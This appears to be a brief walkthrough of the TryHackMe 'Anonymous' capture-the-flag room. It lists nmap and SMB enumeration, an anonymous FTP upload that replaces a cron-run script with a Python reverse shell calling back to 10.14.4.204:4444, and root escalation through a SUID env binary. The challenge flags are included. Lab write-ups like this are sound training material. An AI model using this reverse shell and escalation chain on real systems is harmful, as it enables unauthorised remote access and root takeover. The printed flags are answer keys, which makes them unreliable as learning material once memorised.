Anonymous

https://tryhackme.com/room/anonymous

Task 1 Pwn

Enumerate the machine. How many ports are open?

nmap -sC -sV -T5 -p1-65535 10.10.17.122

4

What service is running on port 21?

ftp

What service is running on ports 139 and 445?

smb

There's a share on the user's computer. What's it called?

enum4linux -S 10.10.17.122

user.txt

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

nc -nvlp 4444

mget *
ls -all
vi clean.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.4.204",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

ftp 10.10.178.0
anonymous
password
cd scripts
mput clean.sh
y

90d6f992585815ff991e68748c414740

root.txt

find / -perm -u=s -type f 2>/dev/null

env | GTFOBins

env /bin/sh -p
cat /root/root.txt

4d930091c31a622a7ed10f27999af363